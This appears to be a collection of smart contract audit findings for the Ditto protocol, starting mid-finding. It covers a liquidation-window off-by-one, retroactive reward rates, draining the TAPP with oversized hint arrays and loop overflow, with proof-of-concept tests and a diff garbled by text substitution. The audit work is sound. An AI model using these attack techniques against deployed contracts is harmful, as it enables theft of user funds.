111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to user's `cRatio` to be considered as `>initialCR` even when it's slightly lower. This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): Multiplication and division operations should not be done directly on top of fetched oracle price, without paying attention to new order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 815 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracle\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.
```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n
Primary short liquidation can not be completed in the last hour of the liquidation timeline
medium
Shorts flagged for liquidation can not be liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.
Consider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.
null
```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n
Changes in `dittoShorterRate` affect retroactively to accrued Ditto yield shares
low
The calculation of the Ditto rewards earned by shorters does not take into account that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and in line 138 calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nIf we take a look in line 135 at how the `dittoRewardShortersTotal` is calculated, we can see that it is the product of the Ditto shorter rate and total time elapsed since the protocol deployment.\\nThis last calculation is wrong, as it is assumed that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. This means that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Also, users that have yielded the same number of shares during the same period, will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n function testYieldRateChange() public {\\n address alice = makeAddr("alice");\\n address bob = makeAddr("bob");\\n address[] memory assets = new address[](1);\\n assets[0] = asset;\\n\\n fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n generateYield();\\n skip(yieldEligibleTime);\\n\\n // Alice and Bob have the same number of Ditto yield shares\\n assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, alice));\\n\\n // Alice's yield is distributed\\n vm.prank(alice);\\n diamond.distributeYield(assets);\\n\\n // Ditto shorter rate is updated\\n vm.prank(owner);\\n diamond.setDittoShorterRate(vault, 2);\\n\\n // Bob's yield is distributed\\n vm.prank(bob);\\n diamond.distributeYield(assets);\\n\\n uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n // Bob receives more Ditto rewards than Alice, even both were entitled to the same amount\\n assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n }\\n```\\n
Create two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\n
Changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.
```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n
Margin callers can drain the TAPP during liquidation by willingly increase gas costs with the shortHintArray
high
During primary liquidation the TAPP (Treasury Asset Protection Pool) pays the gas costs of force bids, so that margin callers are even motivated to liquidate shorters, if gas costs are high. To liquidate a shortRecord margin, callers must provide a parameter called shortHintArray to the function call. The purpose of this array is to save gas, it should contain id hints where the protocol should look for shorts in the order book which are currently above the oracle price, since users can't match against shorts under the oracle price. As the protocol loops through this shortHintArray, an array with wrong hints could increase gas and as the length of the array is never checked, it could even increase the gas costs to an amount that would fully drain the TAPP. As the TAPP is an important security mechanism of the protocol, draining the funds of it could lead to a shutdown of the market and therefore to a big loss of user funds.\\nThe liquidate function takes the shortHintArray as parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forceBid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nAnd during these process, the protocol loops over this array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a big shortHintArray with wrong hints the gas costs will drastically increase to a point which drains the funds of the TAPP.
Check the length of the shortHintArray.
As the TAPP does no longer has enough funds to pay for liquidation, if shortRecords are under collateralized. A lot of problems like the increment of the ercDebtRate and the shutdown of the market can occur. This leads to a big loss of user funds.
```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n
The protocol allows less flags to be generated than possible which could lead to a DoS of the primary liquidation process
low
The maximum flags (for liquidation) that can exist at the same time should be limited by the maximum number, of flaggerIdCounter which is a uint24, but it is limited by the maximum number of a uint16 instead. Therefore, a maximum of 65535 shortRecords can be flagged for liquidation at the same time. This is way too less if the protocol is used a lot and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter and therefore the maximum of flags that can exist at the same time is limited by the maximum number of a uint24:\\n```\\nuint24 flaggerIdCounter;\\n```\\n\\nIf there are no flags left to override the system tries to generate a new flagId, but it does not use the maximum number of uint24, it uses the maximum number of uint16 instead, which is 65535:\\n```\\n} else if (s.flaggerIdCounter < type(uint16).max) {\\n //@dev generate brand new flaggerId\\n short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n s.flaggerIdCounter++;\\n} else {\\n revert Errors.InvalidFlaggerHint();\\n}\\n```\\n\\nThis could be way to less if the protocol is used a lot and the price of a market goes up. Therefore it would prevent creating new flaggerIds and shortRecords with unhealthy CR can not be liquidated.
Set the check to type(uint24).max.
DoS of the liquidation process, which could potentially lead to a lot of shortRecords with unhealthy CR, which could in the worst case lead to the situation that assets are no longer backed enough, and the market needs to be shut down. This would result in a big loss of user funds.
```\\nuint24 flaggerIdCounter;\\n```\\n
Infinite loop breaks protocol functionality.
low
Protocol documentation says that DAO is able to cancel up to 1,000 orders when order count is above 65,000. However, because of the faulty `for loop` it is impossible to cancel more than 255 orders.\\nVulnerability details\\n`orderId` is implemented in protocol to index orders in orderbook. In the protocol documentation it is written that it can handle above 65,000 orders because of reusable orderIds. When there are more than 65,500 orders DAO can cancel up to 1,000 orders. Here are the code blocks from `cancelOrderFarFromOracle` function which allows DAO to cancel orders. It also allows user to cancel one order.\\nIt makes sure that there are more than 65,000 orders.\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that DAO can't cancel more than 1,000 orders.\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\nLater `cancelOrderFarFromOracle` checks if `msg.sender == LibDiamond.diamondStorage().contractOwner` and based on the boolean value (true or false) of this statement it allows to cancel the desired amount of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol) which is called on the mapping of orders of specified earlier `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n \\n```\\n\\nThis function receives parameters:\\nmapping of orders to cancel\\naddress of asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nWhen we look at the implementation of this function we can see that `uint8` was used as a variable for the iteration in the `for loop`. `uint8` i maximum value is `255`. As we can see in the `for loop` there is `unchecked` statement which allows uint underflow / overflow.\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nSo when we try to add 1 to 255 (255 + 1) solidity would automaticly `revert` due to uint overflow but when we use `unchecked` solidity allows us to do this operation and the result of this will be `0`.\\nWhen DAO would like to cancel more than 255 orders it would result in infinite loop since:\\nthe for loop will iterate when `i` < numOrdersToCancel\\nthe vaule of `i` will always be less than 256 because it can't get bigger than that due to overflow\\n`i = 255` and `i < 256` `unchecked {++i;}` Next iteration `i = 0` and `i < 256` `unchecked {++i;}`\\nI created pretty simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 orders cancelations run this function with input parameter (amountOfItertions) equal to 256 or above.\\nFurther explenation\\nAfter DAO tries to cancel more than 255 orders the infinite loop will be created which will terminate the transaction.\\nThe transaction will fail because of gas consumption. For loop will run as many times as it can with provided gas. Since it will try to run infinitely it will run out of gas.
To solve this problem change `uint8 i` to `uint16` or any higher uint that can handle the desired amount of iterations.
Protocol documentation states that DAO is able to cancel 1,000 orders. Since it is not possible with the current implementation of the code this issue disrupts protocols functionality. The implemented code can't handle desired functionality.\\nTools used\\nVScode, Manual Review, Remix
```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n
Order creation can run out of gas since relying on previous order matchtype
medium
If the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.
I think the probability of the above scenario is higher than that of multiple user's cancelling their orders. Hence moving to the next hint order as soon as the current hint order has been found to be reused could be better and will cost less gas on error.
Order creation can run out-of-gas on particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/test/AskSellOrders.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/AskSellOrders.t.sol\\n@@ // Remove the line below\\n8,7 // Add the line below\\n8,7 @@ import {Errors} from "contracts/libraries/Errors.sol";\\n import {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";\\n \\n import {OBFixture} from "test/utils/OBFixture.sol";\\n// Remove the line below\\n// import {console} from "contracts/libraries/console.sol";\\n// Add the line below\\nimport {console} from "contracts/libraries/console.sol";\\n \\n contract SellOrdersTest is OBFixture {\\n using U256 for uint256;\\n@@ // Remove the line below\\n59,6 // Add the line below\\n59,49 @@ contract SellOrdersTest is OBFixture {\\n assertEq(asks[0].price, DEFAULT_PRICE);\\n }\\n \\n// Add the line below\\n function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n// Add the line below\\n for (uint256 i = 0; i < 1000; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // a new order at the bottom of the order book\\n// Add the line below\\n fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n// Add the line below\\n assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n// Add the line below\\n\\n// Add the line below\\n // user wants to create an order at HIGHER_PRICE\\n// Add the line below\\n MTypes.OrderHint[] memory orderHintArray =\\n// Add the line below\\n diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n// Add the line below\\n uint16 targetOrderId = orderHintArray[0].hintId;\\n// Add the line below\\n assertTrue(targetOrderId == getAsks()[1000].id);\\n// Add the line below\\n\\n// Add the line below\\n // the target order gets cancelled\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n cancelAsk(targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a person creates a limit ask which reuses the cancelled order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a bid matches the targetId\\n// Add the line below\\n fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n // another person creates a limit ask which reuses the matched order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // the tx of the user goes through\\n// Add the line below\\n depositUsd(sender, DEFAULT_AMOUNT);\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n uint256 gasStart = gasleft();\\n// Add the line below\\n diamond.createAsk(\\n// Add the line below\\n asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n// Add the line below\\n );\\n// Add the line below\\n uint256 gasUsed = gasStart // Remove the line below\\n gasleft();\\n// Add the line below\\n assertGt(gasUsed, 2_000_000);\\n// Add the line below\\n console.log(gasUsed);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\n
